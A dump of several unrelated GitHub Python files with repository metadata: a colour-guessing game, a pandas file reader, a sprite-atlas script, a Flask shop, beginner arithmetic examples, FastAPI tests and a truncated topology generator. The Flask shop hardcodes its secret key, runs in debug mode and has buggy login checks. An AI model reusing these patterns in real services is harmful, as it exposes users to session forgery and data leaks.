game...\")\r\n time.sleep(2)\r\n leaderboard_Text.setText(\"\") \r\n\r\n else:\r\n exit() \r\n\r\n def leaderstats(self):\r\n ''' Stores player's name and score on leaderboard_CGG.txt''' \r\n global score\r\n \r\n infile = open('leaderboard_CGG.txt','r')\r\n outline = open('leaderboard_CGG.txt','a')\r\n \r\n outline.write(\"\\n\")\r\n leaderboard_Text = Text(Point(250.0,280.0),\"LeaderBoard:\\n Enter your name.\")\r\n leaderboard_Text.setFill(\"white\")\r\n leaderboard_Text.setSize(16)\r\n leaderboard_Text.setFace(\"courier\")\r\n leaderboard_Text.setStyle(\"bold\")\r\n leaderboard_Text.draw(win)\r\n\r\n outline.write(Game.entryBox(self))\r\n \r\n outline.write(\" \")\r\n outline.write(str(score))\r\n print(\"Player data stored...\")\r\n\r\n leaderboard_Text.setText(\"Ok,\\nStoring your score...\")\r\n time.sleep(2)\r\n leaderboard_Text.setText(\"Done! name stored\")\r\n time.sleep(2)\r\n leaderboard_Text.setText(\" \")\r\n \r\n infile.close()\r\n outline.close() \r\n \r\n def gameplay(self):\r\n ''' Game functionality '''\r\n global score\r\n\r\n entryBox = Game.entryBox\r\n\r\n while True:\r\n\r\n random_color = random.choice(colors)\r\n random_Fill = random.choice(colors)\r\n answer_color = random_Fill\r\n\r\n colorText = Text(Point(250.0,280.0), random_color)\r\n colorText.setFill(random_Fill)\r\n colorText.setSize(36)\r\n colorText.draw(win)\r\n\r\n if (entryBox(self) == answer_color): \r\n score += 1\r\n scoreText.setText(\"Score: \" + str(score))\r\n colorText.setText(random_color)\r\n #print(\"Good answer\") #Terminal answer\r\n\r\n goodLabel = Text(Point(250.0,280.0), \"Good Answer\")\r\n goodLabel.setSize(20)\r\n goodLabel.setFill(\"white\")\r\n goodLabel.setFace(\"courier\")\r\n goodLabel.draw(win)\r\n\r\n colorText.setText(\"\")\r\n time.sleep(0.5)\r\n goodLabel.setText(\"\")\r\n \r\n else:\r\n #print(\"Bad answer\") #Terminal answer\r\n badLabel = Text(Point(250.0,280.0),\"Bad Answer:\\n %s\" %answer_color)\r\n badLabel.setSize(20)\r\n badLabel.setFill(\"white\")\r\n badLabel.setFace(\"courier\")\r\n badLabel.draw(win)\r\n\r\n colorText.setText(\"\")\r\n time.sleep(2.5)\r\n badLabel.setText(\"\")\r\n\r\n colorText.setText(\"\")\r\n \r\n gameover_Label = Text(Point(250.0,280.0),\"GAME OVER\")\r\n gameover_Label.setSize(20)\r\n gameover_Label.setFill(\"white\")\r\n gameover_Label.setStyle(\"bold\")\r\n gameover_Label.setFace(\"courier\")\r\n gameover_Label.draw(win)\r\n print(\"GAME OVER...\")\r\n time.sleep(2)\r\n gameover_Label.undraw()\r\n break\r\n\r\n def gameStart(self):\r\n '''Include all functions from class Game and GUI'''\r\n \r\n while True: \r\n gui = GUI()\r\n gui.window()\r\n game.gameplay()\r\n game.leaderstats()\r\n game.game_reset() \r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n game = Game()\r\n game.gameStart()\r\n","repo_name":"Nytsu/GGC-COLOR_GUESS_GAME","sub_path":"CGG ver.0.2.py","file_name":"CGG ver.0.2.py","file_ext":"py","file_size_in_byte":8301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26890200914","text":"import copy\nimport pandas as pd\n\nfrom wadi.base import WadiBaseClass\nfrom wadi.infotable import InfoTable\nfrom wadi.utils import check_arg, valid_kwargs\n\n# Valid values for the 'format' kwarg\nVALID_FORMATS = [\"stacked\", \"wide\", \"gef\"]\n\n# Required column headers for 'stacked' format\nREQUIRED_COLUMNS_S = [\"SampleId\", \"Features\", \"Values\", \"Units\"]\nDEFAULT_C_DICT = {s: s for s in REQUIRED_COLUMNS_S}\n\n# Valid values for the 'datatype' kwarg for 'wide' format\nVALID_DATATYPES = [\"sampleinfo\", \"feature\"]\n# Select one of the VALID_DATATYPES as the default datatype\nDEFAULT_DATATYPE = VALID_DATATYPES[1]\n\n# Default NaN values, used if user does not specify a value for the na_values\n# kwarg for read_excel or read_csv\n# Copied from https://pandas.pydata.org/docs/reference/api/pandas.read_csv.html\nDEFAULT_NA_VALUES = [\n \"\",\n \"-1.#IND\",\n \"1.#QNAN\",\n \"1.#IND\",\n \"-1.#QNAN\",\n \"#N/A\",\n \"N/A\",\n #'NA', # Commented to avoid ambiguity with Na (Sodium)\n \"#NA\",\n \"NULL\",\n \"NaN\",\n \"-NaN\",\n \"nan\",\n \"-nan\",\n]\n\n\nclass FileReader(WadiBaseClass):\n \"\"\"\n WaDI class for importing data files.\n \"\"\"\n\n def __call__(\n self,\n file_path,\n format=\"stacked\", # str, immutable\n c_dict=None,\n mask=None,\n lod_column=None,\n extract_units_from_feature_name=False,\n pd_reader=\"read_excel\", # str, immutable\n **kwargs,\n ):\n\n \"\"\"\n This method provides an interface for the user to set the\n attributes that determine the FileReader object behavior.\n\n Parameters\n ----------\n file_path : str\n The file to be read.\n format : str, optional\n Specifies if the data in the file are in 'stacked' or 'wide'\n format. Permissible formats are defined in VALID_FORMATS.\n The 'gef' format is not implemented (yet). Default: 'stacked'\n c_dict : dict, optional\n Only used when the format is 'stacked'. This dictionary maps\n column names in the file to the compulsory column names defined\n in REQUIRED_COLUMNS_S. Default: DEFAULT_C_DICT\n mask : str, optional\n Name of the column that contains True/False labels. These sometimes\n occur in stacked data files to indicate if a reported value is \n below or above the detection limit. If a valid column name is \n specified, the values marked with `False` are filtered out from \n the converted DataFrame. Only used when the format is 'stacked'.\n Default: None\n lod_column : str, optional\n Name of the column that contains information about whether the \n reported measurement value is below or above the limit of \n detection (LOD). If a valid column name is specified, the\n symbol is prefixed to the measurement value.\n Only used when the format is 'stacked'. Default: None\n extract_units_from_feature_name : bool\n Indicates if the feature name also contains the units. Default:\n False\n pd_reader : str, optional\n Name of the Pandas function to read the file. Must be a valid\n function name. While all functions implemented in Pandas could\n be used in principle, the design of WaDI has not been tested\n for functions other than read_excel and read_csv. Default:\n 'read_excel'.\n **kwargs: dict, optional\n Dictionary with kwargs for the 'pd_reader' function. The\n kwargs can be a mix of WaDI specific keywords and valid\n keyword arguments for the 'pd_reader' function.\n \"\"\"\n\n self._file_path = file_path\n self._pd_reader = pd_reader\n\n # Check if user provided a valid format specifier\n format = check_arg(format, VALID_FORMATS)\n # Raise error if the format is not yet implemented\n if format in [\"gef\"]:\n raise NotImplementedError(f\"Format option {format} not implemented yet\")\n self._format = format # for use in read_data\n\n # Use c_dict to look up the names of the columns with the compulsory\n # names for stacked data.\n self._c_dict = c_dict or DEFAULT_C_DICT\n\n self._mask = mask\n self._lod_column = lod_column\n self._extract_units_from_feature_name = extract_units_from_feature_name\n\n self._kwargs = copy.deepcopy(vars()[\"kwargs\"]) # deepcopy just to be sure\n\n def _execute(self):\n \"\"\"\n This method imports the data from a file format readable by\n Pandas. Before calling the Pandas reader function, it checks\n the kwargs specified by the user when the class object was \n initialized. \n \"\"\"\n\n # Use the defaults for na_values if the user did not specify their own\n if \"na_values\" not in self._kwargs:\n self._kwargs[\"na_values\"] = DEFAULT_NA_VALUES\n\n # Check if the user specified the 'blocks' kwarg, which\n # means that multiple dataframes must be read and joined\n if \"blocks\" not in self._kwargs:\n # If blocks is not in kwargs then store the kwargs in a\n # one-element list\n blocks = [self._kwargs]\n else:\n # If blocks is in kwargs then check if it's a sequence\n # before continuing\n blocks = self._kwargs[\"blocks\"]\n if not isinstance(blocks, (list, tuple)):\n raise ValueError(\"Argument 'blocks' must be a list or a tuple\")\n\n # Loop over the blocks to perform some checks for inconsistent kwargs\n for kwargs in blocks:\n # For stacked data the units and datatype are inferred\n # from c_dict when the InfoTable is created\n if (self._format == \"stacked\") & (\"units_row\" in kwargs):\n kwargs.pop(\"units_row\")\n self._warn(\n \"Argument 'units_row' can not be used in combination with stacked format and will be ignored.\"\n )\n if (self._format == \"stacked\") & (\"datatype\" in kwargs):\n kwargs.pop(\"datatype\")\n self._warn(\"Argument 'datatype' is ignored when format is 'stacked'.\")\n\n # Call _read_file to import the (blocks of) data into a single \n # DataFrame.\n df, units, datatypes = self._read_file(self._file_path, self._pd_reader, blocks)\n\n if self._format == \"stacked\":\n # Use the values in the column with name 'mask' to\n # hide the values labelled as False from view.\n if self._mask is not None:\n df = df.loc[df[self._mask]]\n\n if self._lod_column is not None:\n df[self._c_dict[\"Values\"]] = df[self._lod_column] + df[self._c_dict[\"Values\"]].astype(str)\n\n # Create the InfoTable dictionary that stores views to the\n # imported data as well as additional information (units,\n # data type)\n infotable = InfoTable(\n df,\n self._format,\n self._c_dict,\n units,\n datatypes,\n self._extract_units_from_feature_name,\n )\n\n # Write the __str__ representation of the InfoTable to the\n # log file.\n self._log(infotable)\n\n # Write the log string to the log file\n self.update_log_file()\n\n return df, infotable\n\n def _read_file(\n self,\n file_path,\n pd_reader_name,\n blocks,\n ):\n \"\"\"\n This method calls the specified Pandas reader function to\n perform the actual data import from file_path. It imports\n a DataFrame with the data as well as lists with the\n measurement units and the datatypes (the latter two are \n not used when the data are in 'stacked' format).\n\n Parameters\n ----------\n file_path : str\n The file to be read.\n pd_reader_name : str\n Name of the Pandas function to read the file.\n blocks : list\n List with keyword arguments that specify (i) the number\n of the row with the units, (ii) the datatpe and (iii) any\n kwargs for the pd_reader function. Note that (i) and (ii)\n do not apply to 'stacked' data.\n\n Returns\n ----------\n df : DataFrame\n Pandas DataFrame with the imported data\n units : list\n List with the units for each column read.\n datatypes: list\n List with the datatypes for each column read.\n\n Raises\n ------\n ValueError\n When index_col is a kwarg in one of the blocks.\n\n Notes\n ----------\n The return values units and datatypes are used when the\n InfoTable is created for 'wide' format data. They are not\n used when the data format is 'stacked'.\n \"\"\"\n\n # Inform user with message on screen that reading has started (may\n # take a long time for large files)\n self._msg(f\"Reading data\", header=True)\n self._log(f\"* Reading file {file_path} with the following Pandas call(s):\")\n\n # Get reference to pandas reader function and determine its valid\n # keyword arguments\n pd_reader = getattr(pd, pd_reader_name)\n if not (pd_reader.__name__ in [\"read_excel\", \"read_csv\"]):\n self._warn(\n f\"WaDI has not been designed to work with reader {pd_reader}. Proceed with caution.\"\n )\n\n # Start with an empty DataFrame...\n df = pd.DataFrame()\n # ... and empty lists for units and datatype.\n units = []\n datatypes = []\n # Loop over the sets of kwargs in the block(s).\n for pd_kwargs in blocks:\n # Set values for unit_row and datatype, these may be\n # overridden if the user specified a kwarg for any\n # of them.\n units_row = -1\n datatype = DEFAULT_DATATYPE\n # Loop over the user-specified kwargs.\n for kwarg in pd_kwargs.copy(): # copy() is needed to avoid a RuntimeError\n if kwarg == \"units_row\":\n units_row = pd_kwargs[kwarg]\n # Check if a valid datatype was passed and convert to\n # one of the standard formats contained in VALID_DATAYPES.\n if kwarg == \"datatype\":\n datatype = check_arg(pd_kwargs[kwarg], VALID_DATATYPES)\n # Index columns are not supported to avoid duplicate.\n # index errors etc.\n if kwarg == \"index_col\":\n raise ValueError(\"Argument 'index_col' not allowed in WADI\")\n\n # Create a verbose message for the log file.\n kws = \", \".join(f\"{k}={v}\" for k, v in pd_kwargs.items())\n self._log(f\" - pandas.{pd_reader_name}('{file_path}', {kws})\")\n\n # Call the requested Pandas reader function to import the data.\n df_r = pd_reader(file_path, **valid_kwargs(pd_reader, **pd_kwargs))\n\n # Use the pd.concat function to join the return values from the\n # pandas reader function (i.e. the DataFrames read from the file).\n df = pd.concat([df, df_r], axis=1)\n\n # Read the units if the user specified a valid row number, else...\n if units_row > -1:\n units += self._read_single_row_as_list(\n file_path, pd_reader, pd_kwargs, units_row\n )\n # ... create a list of empty strings with the same length as the\n # number of columns read\n else:\n units += [\"\"] * df_r.shape[1]\n\n # Make sure that the datatype for this block is copied as many\n # times as there are columns in the DataFrame that was read\n datatypes += [datatype] * df_r.shape[1]\n\n return df, units, datatypes\n\n def _read_single_row_as_list(\n self,\n file_path,\n pd_reader,\n pd_kwargs,\n row_number,\n ):\n \"\"\"\n This method calls the specified Pandas reader function to\n read a single row from file_path.\n\n Parameters\n ----------\n file_path : str\n The file to be read.\n pd_reader_name : str\n Name of the Pandas function to read the file.\n pd_kwargs : dict\n Keyword arguments for the pd_reader function.\n row_number : int\n The (zero-based) number of the row to read.\n\n Returns\n ----------\n result : list\n List with the values read.\n \"\"\"\n # Assemble the appropriate kwargs to read a single row,\n # this may include the user-specified keywords sheet_name\n # and usecols.\n sr_kwargs = {} # sr is shorthand for single row\n if \"sheet_name\" in pd_kwargs:\n sr_kwargs[\"sheet_name\"] = pd_kwargs[\"sheet_name\"]\n if \"usecols\" in pd_kwargs:\n sr_kwargs[\"usecols\"] = pd_kwargs[\"usecols\"]\n sr_kwargs[\"header\"] = None\n # Note that header=None does not seem to work in conjuction\n # with skiprows! Therefore, read the data up until row \n # row_number + 1, the units will be in the last row of the\n # dataframe returned by the reader.\n sr_kwargs[\"nrows\"] = row_number + 1\n\n # Read the data, replace any NaNs with empty strings and \n # return the last row of the DataFrame as a list\n return pd_reader(file_path, **sr_kwargs).fillna(\"\").values[-1].tolist()\n","repo_name":"KWR-Water/wadi","sub_path":"wadi/filereader.py","file_name":"filereader.py","file_ext":"py","file_size_in_byte":13556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13770600256","text":"#!/usr/bin/env python\n\n\nimport sys\nimport os\nimport json\n\n\nDIRECTORY = os.path.dirname(__file__)\nPARENT_DIRECTORY = os.path.dirname(DIRECTORY)\n\nif (DIRECTORY.endswith(\"samples\")):\n sys.path.append(PARENT_DIRECTORY)\n\n\nfrom sprite.component import SpriteComponent\nfrom sprite.atlas import Atlas\n\n\nIMG_DIR = os.path.join(DIRECTORY, \"img\")\nSHEET_PATH = os.path.join(DIRECTORY, \"sample_atlas.png\")\nMETA_PATH = os.path.join(DIRECTORY, \"sample_atlas.json\")\n\n\n\n\n\ndef make_atlas():\n a = Atlas(\"SAMPLE SPRITE\\n{size}\", min_size=(128, 128))\n for filename in os.listdir(IMG_DIR):\n filepath = os.path.join(IMG_DIR, filename)\n name = filename.split(\".\")[0]\n component = SpriteComponent(name, filepath=filepath)\n a.add_component(component)\n a.dump_atlas(SHEET_PATH)\n with open(META_PATH, \"w\") as f:\n json.dump(a.get_meta(), f, indent=4)\n\n\n\nif __name__ == \"__main__\":\n make_atlas()\n\n","repo_name":"drekels/python-sprite","sub_path":"samples/make_atlas.py","file_name":"make_atlas.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16468715899","text":"from itertools import count, product\nfrom operator import mod\nimport re\nfrom flask import Flask, redirect, url_for, request, render_template, session\nfrom flask.helpers import flash\nfrom flask_wtf import form\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql.operators import isnot\nfrom sqlalchemy.util.langhelpers import method_is_overridden\nfrom wtforms.validators import Email\nfrom forms import SignInForm, SignUpForm,AddProductForm,EditProductForm,OrderForm\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport os\nfrom werkzeug.utils import secure_filename\nimport fireStore\n\n\n\nbasedir = os.path.abspath(os.path.dirname('__file__'))\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '8192hdw8y31993r9128yw98y3yewe13'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'app.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATION'] = False\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\nimport models\n\n\n#config firebase\n\n\n\ndef sumOrder(user):\n carts=db.session.query(models.Cart).filter_by(user_id=user.user_id).all()\n sum=0\n for c in carts:\n sum=sum+c.count*db.session.query(models.Product).filter_by(product_id=c.product_id).first().price\n return sum\n \n\n \n\n@app.route(\"/\",methods=['POST','GET'])\ndef hello_world():\n userImg = \"../static/images/guest.png\"\n user_id = session.get('user') \n user=db.session.query(models.User).filter_by(user_id=user_id).first()\n products = db.session.query(models.Product).all()\n pImgs=[]\n for p in products:\n pImgs.append(fireStore.getProductImg(p.product_id))\n if user_id:\n userImg=fireStore.getUserImg(user_id) \n return render_template('homepage.html', userImg=userImg, user=user, products=products, pImgs=pImgs)\n \n return render_template('homepage.html', userImg=userImg, user=user, products=products, pImgs=pImgs)\n \n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n form = SignInForm()\n userImg = \"../static/images/guest.png\"\n if form.validate_on_submit():\n _email = form.inputEmail.data\n _password = form.inputPassword.data\n \n user = db.session.query(models.User).filter_by(email=_email).first()\n if user is None:\n flash(\"❌ Your email does not exist! Check it again or create another account!\")\n elif user.check_password(_password): \n session['user']=user.user_id \n return redirect(url_for('user'))\n else:\n flash(\"Wrong password\")\n\n\n return render_template('login.html', form=form, userImg=userImg)\n\n\n@app.route(\"/signup\", methods=['GET', 'POST'])\ndef signup():\n form = SignUpForm()\n userImg = \"../static/images/guest.png\"\n if form.validate_on_submit():\n if form.inputPassword.data == form.inputConfirmPassword.data:\n _fullname = form.inputFullName.data\n _email = form.inputEmail.data\n _phone= form.inputPhone.data\n _addr=form.inputAddress.data\n _password = form.inputPassword.data\n if db.session.query(models.User).filter_by(email=_email).count()==0:\n user=models.User(full_name=_fullname,email=_email,role=\"customer\")\n user.set_password(_password)\n db.session.add(user)\n db.session.commit()\n user=db.session.query(models.User).filter_by(email=_email).first()\n db.session.add(models.Phone(user_id=user.user_id,phonenumber=_phone))\n db.session.add(models.Address(user_id=user.user_id,address=_addr))\n db.session.commit()\n fireStore.putDefaultImg(user.user_id)\n session['user']=user.user_id\n return redirect(url_for('user'))\n else:\n flash(\"❌ Your Email is exist! Please login.\")\n else:\n flash(\"❌ Confirm password is incorrect!\")\n return render_template('signup.html', form=form, userImg=userImg)\n\n\n\n@app.route(\"/user\", methods=['GET', 'POST'])\ndef user():\n user_id = session.get('user') \n user=db.session.query(models.User).filter_by(user_id=user_id).first()\n userImg = fireStore.getUserImg(str(user_id))\n if user is None: \n return redirect(\"/\") \n \n else:\n if request.method == 'POST':\n if \"accept\" in request.form: \n if request.files['file'].filename != '': \n f = request.files['file']\n f.save(secure_filename(\"user\"+str(user.user_id)+\".png\")) \n fireStore.putUserImG(user_id)\n os.remove(\"user\"+str(user.user_id)+\".png\")\n return redirect(url_for('user')) \n elif \"cancel\" in request.form:\n return redirect(url_for('user')) \n elif \"logout\" in request.form:\n session['user']=0\n return redirect('/') \n\n return render_template(\"user.html\",userImg=userImg, user=user)\n \n \n\n@app.route(\"/ProductManager\", methods=['GET', 'POST'])\ndef productManager():\n form= AddProductForm()\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n userImg = fireStore.getUserImg(str(user.user_id))\n if user.role==\"manager\":\n products=db.session.query(models.Product).all()\n pImgs=[]\n for p in products:\n pImgs.append(fireStore.getProductImg(p.product_id))\n \n if form.submit.data and form.validate(): \n product=models.Product(product_name=form.inputName.data,description=form.inputDes.data, price=form.inputPrice.data, status=\"Active\")\n db.session.add(product)\n db.session.commit()\n p_id=db.session.query(models.Product).count()\n f=request.files['file']\n f.save(secure_filename(\"product\"+str(p_id)+\".png\")) \n fireStore.putProductImg(p_id)\n os.remove(\"product\"+str(p_id)+\".png\")\n return redirect('ProductManager') \n \n return render_template(\"productManager.html\",userImg=userImg, user=user, products=products, pImgs=pImgs, form=form)\n else:\n return redirect(\"/\")\n\n@app.route(\"/edit/\", methods=['GET', 'POST'])\ndef edit(product_id):\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n userImg = fireStore.getUserImg(str(user.user_id))\n product=db.session.query(models.Product).filter_by(product_id=product_id).first()\n pImg=fireStore.getProductImg(product_id)\n form=EditProductForm()\n if user.role==\"manager\": \n \n form.inputStatus.choices=[(1,\"Active\"),(2,\"Inactive\")] \n if form.validate_on_submit(): \n if form.inputStatus.data==1:\n product.product_name=form.inputName.data\n product.description=form.inputDes.data\n product.price=form.inputPrice.data\n product.status='Active'\n flash(form.inputName.data)\n \n else:\n product.product_name=form.inputName.data\n product.description=form.inputDes.data\n product.price=form.inputPrice.data\n product.status='Inactive' \n \n db.session.commit() \n \n if request.files['file'].filename != '':\n f=request.files['file']\n f.save(secure_filename(\"product\"+str(product.product_id)+\".png\")) \n fireStore.putProductImg(product.product_id)\n os.remove(\"product\"+str(product.product_id)+\".png\")\n return redirect('/ProductManager') \n return render_template(\"editProduct.html\",userImg=userImg, user=user, form=form, product=product, pImg=pImg)\n else:\n return redirect(\"/\")\n\n@app.route(\"/product/\", methods=['GET', 'POST'])\ndef product(product_id):\n userImg = \"../static/images/guest.png\"\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n if user:\n userImg = fireStore.getUserImg(str(user.user_id))\n product=db.session.query(models.Product).filter_by(product_id=product_id).first()\n pImg=fireStore.getProductImg(product_id)\n if request.method=='POST':\n if user:\n if \"cart\" in request.form:\n c=db.session.query(models.Cart).filter_by(user_id=user.user_id, product_id=product_id).first()\n if c:\n c.count = c.count + 1\n else:\n c=models.Cart(product_id=product_id, user_id=user.user_id, count=1)\n db.session.add(c)\n db.session.commit()\n else:\n flash(\"Please login at first!\")\n return redirect('/login')\n return render_template(\"product.html\",userImg=userImg, user=user, product=product, pImg=pImg)\n\n@app.route(\"/cart\", methods=['GET', 'POST'])\ndef cart():\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n userImg = fireStore.getUserImg(str(user.user_id))\n\n if user: \n products = db.session.query(models.Product).all()\n carts = db.session.query(models.Cart).filter_by(user_id=user.user_id).all()\n pImgs=[]\n for p in products:\n pImgs.append(fireStore.getProductImg(p.product_id))\n\n if request.method=='POST':\n for c in carts:\n if \"+\"+str(c.product_id) in request.form:\n c.count=c.count+1\n elif \"-\"+str(c.product_id) in request.form:\n if c.count >1:\n c.count=c.count-1\n elif \"r\"+str(c.product_id) in request.form:\n db.session.delete(c)\n carts.remove(c)\n db.session.commit()\n\n return render_template(\"cart.html\",products=products, carts=carts, user=user, userImg=userImg, pImgs=pImgs)\n else:\n return redirect('/')\n\n@app.route(\"/placeOrder\", methods=['GET', 'POST'])\ndef placeOrder():\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n userImg = fireStore.getUserImg(str(user.user_id))\n if user: \n products = db.session.query(models.Product).all()\n carts = db.session.query(models.Cart).filter_by(user_id=user.user_id).all()\n pImgs=[]\n \n for p in products:\n pImgs.append(fireStore.getProductImg(p.product_id))\n \n \n if request.method=='POST':\n if len(carts)==0:\n flash(\"Please add product to your cart\")\n if \"order\" in request.form: \n order=models.Order(user_id=user.user_id,Status=\"Delivering\",phone=request.form.get('phone'), address=request.form.get('address'))\n db.session.add(order)\n db.session.commit()\n order=db.session.query(models.Order).filter_by(order_id=len(db.session.query(models.Order).all())).first()\n for c in carts:\n orderProduct=models.OrderProduct(order_id=order.order_id,product_id=c.product_id,count=c.count)\n db.session.delete(c)\n db.session.add(orderProduct)\n db.session.commit()\n return redirect('/')\n \n \n\n return render_template(\"place.html\",products=products, carts=carts, user=user, userImg=userImg, pImgs=pImgs, sum=sumOrder(user),form=form)\n else:\n return redirect('/')\n\ndef total(order_id):\n order=db.session.query(models.Order).filter_by(order_id=order_id).first()\n total=0\n for p in order.order_products:\n total=total+p.product.price*p.count\n return total\n\n@app.route(\"/order\", methods=['GET', 'POST'])\ndef order():\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n userImg = fireStore.getUserImg(str(user.user_id))\n if user is not None: \n return render_template(\"order.html\",user=user,userImg=userImg)\n else:\n return redirect(\"/\")\n\n@app.route(\"/order/detail\", methods=['GET', 'POST'])\ndef detail(order_id):\n user=db.session.query(models.User).filter_by(user_id=session.get('user')).first()\n userImg = fireStore.getUserImg(str(user.user_id))\n order=db.session.query(models.Order).filter_by(order_id=order_id).first()\n \n if user is not None and order.user_id == user.user_id:\n pImgs=[]\n for p in order.order_products:\n pImgs.append(fireStore.getProductImg(p.product_id))\n return render_template(\"detail.html\",user=user,userImg=userImg, order=order)\n else:\n return redirect(\"/\")\n\n\n\n\nif __name__ == '__main__': \n app.run(host='127.0.0.1', port='5050', debug=True)\n","repo_name":"thuanguyenit/FlaskStore","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8563572722","text":"#Operador de Adicao + \na = 20\nb = 30\nc = a + b\nprint(f\"A Soma de {a} + {b} = \", c)\n\n#Operador de Subtracao -\ne = 30\nf = 20\ng = e - f\nprint(f\"A Subtracao de {e} - {f} = \", g)\n\n#Operador de multiplicacao *\nd = 30\ns = 10\nml = d * s\nprint(f\"A Multiplicacao de {d} * {s} = \", ml)\n\n#Operador de Divisao /\ndv = 30\ndl = 10\ndr = dv / dl\nprint(f\"A Divisao de {dv} / {dl} = \", dr)\n\n#Operador de Exponenciacao **\nev = 30\ner = 3\nerr = ev**er\nprint(f\"A Exponenciacao de {ev}**{er} = \", err)\n\n#Operador Modulo //\nmv = 50\nmr = 5\nmrr = mv%mr\nprint(f\"O modulo de {mv} // {mr} = \", mrr)","repo_name":"azevedotau-ai/programming_learn_path","sub_path":"Basic/ArithmeticOperators.py","file_name":"ArithmeticOperators.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30850389500","text":"# pylint: disable=no-self-use\n# - pylint test classes must pass self, even if unused.\n# pylint: disable=invalid-name\n# - this module has some pretty verbose names,\n# shrinking them feels worse than disabling this lint.\n# pylint: disable=logging-fstring-interpolation\n# - honestly just annoying to use lazy(%) interpolation.\n\"\"\"\nEndpoint tests for get event by location query.\n\"\"\"\nimport logging\nfrom typing import Dict, Any\nfrom fastapi.testclient import TestClient\nfrom requests.models import Response as HTTPResponse\n\nfrom app import app\nimport models.events as event_models\n\nclient = TestClient(app)\n\n\ndef get_location_query_from_event(event_form: event_models.Event,\n radius) -> Dict[str, Any]:\n \"\"\"\n Returns a valid json query given a radius and an event form.\n \"\"\"\n location = event_form.location\n query_data = {\n \"lat\": location.latitude,\n \"lon\": location.longitude,\n \"radius\": radius\n }\n return query_data\n\n\ndef check_event_locations_response_valid(response: HTTPResponse) -> bool:\n \"\"\"\n Checks the response for a valid list of events and returns\n true if all the checks pass, else false.\n \"\"\"\n try:\n assert response.status_code == 200\n response_json = response.json()\n assert \"events\" in response_json\n assert response_json[\"events\"]\n assert len(response_json[\"events\"]) > 0\n return True\n except AssertionError as assert_error:\n debug_msg = f\"failed at: {assert_error}. resp json: {response.json()}\"\n logging.debug(debug_msg)\n return False\n\n\ndef get_query_event_location_url() -> str:\n \"\"\"\n Returns the endpoint's url string\n \"\"\"\n return \"/events/location\"\n\n\ndef get_invalid_query_from_event(event_form: event_models.Event,\n radius) -> Dict[str, Any]:\n \"\"\"\n Returns an out of bounds (i.e. invalid) query dict from a given event.\n \"\"\"\n location = event_form.location\n bad_query_data = {\n \"lat\": location.latitude + 1000,\n \"lon\": location.longitude - 1000,\n \"radius\": radius\n }\n\n return bad_query_data\n\n\nclass TestEventsLocation:\n def test_events_location_success(self,\n registered_event: event_models.Event):\n \"\"\"\n Tries to query an existing event by it's approximate location,\n expecting success.\n \"\"\"\n radius = 10\n query_data = get_location_query_from_event(registered_event, radius)\n endpoint_url = get_query_event_location_url()\n response = client.get(endpoint_url, params=query_data)\n\n assert check_event_locations_response_valid(response)\n\n def test_events_location_empty_data_failure(\n self, registered_event: event_models.Event):\n \"\"\"\n Tries to query events by location but sends no args, expecting failure\n \"\"\"\n del registered_event # unused fixture result\n endpoint_url = get_query_event_location_url()\n response = client.get(endpoint_url, params={})\n assert not check_event_locations_response_valid(response)\n\n def test_events_location_no_events_failure(\n self, unregistered_event: event_models.Event):\n \"\"\"\n Tries to query in a massive radius but without any events registered,\n expecting an empty response\n \"\"\"\n huge_radius = 10_000\n query_data = get_location_query_from_event(unregistered_event,\n huge_radius)\n\n endpoint_url = get_query_event_location_url()\n response = client.get(endpoint_url, params=query_data)\n assert not check_event_locations_response_valid(response)\n\n def test_events_location_invalid_lat_lon(\n self, registered_event: event_models.Event):\n \"\"\"\n Tries to query with an invalid lat/lon range, expecting failure\n \"\"\"\n radius = 10\n invalid_query_data = get_invalid_query_from_event(\n registered_event, radius)\n\n endpoint_url = get_query_event_location_url()\n response = client.get(endpoint_url, params=invalid_query_data)\n\n assert not check_event_locations_response_valid(response)\n assert response.status_code == 422\n","repo_name":"SparkDevTeams/underline-backend","sub_path":"tests/test_events_location.py","file_name":"test_events_location.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70121979929","text":"# Libraries\nfrom sympy.combinatorics import GrayCode\nimport sys\nimport math\nimport copy\n\n# Custom files\nfrom place_and_route import place_and_route\nfrom create_tile import create_tile\nfrom error import error, warning\n\n# Map for gray-code like ordering of rows and columns\nrow_map = None\ncol_map = None\n\n# Auxiliary function to transform bit-lists (tile-ids) to row and column of said tile\ndef bin_to_rc(binary, rows, cols):\n\tglobal row_map\n\tglobal col_map\n\tbin_row = binary[:int(math.log2(rows))]\n\tbin_col = binary[int(math.log2(rows)):]\n\trow = row_map[int(bin_row, 2)]\n\tcol = col_map[int(bin_col, 2)]\n\treturn (row, col)\n\t\n# Generate a Hypercube topology\ndef generate(module_name, area, n_endpoints, tech, prot, bw, freq, rows, cols, config):\n\tglobal row_map\n\tglobal col_map\n\tprint(\"Generating Hypercube Topology...\")\n\n\t# VALIDATION: Hypercube specific input validation\n\tif math.log2(rows) % 1 != 0 or math.log2(cols) % 1 != 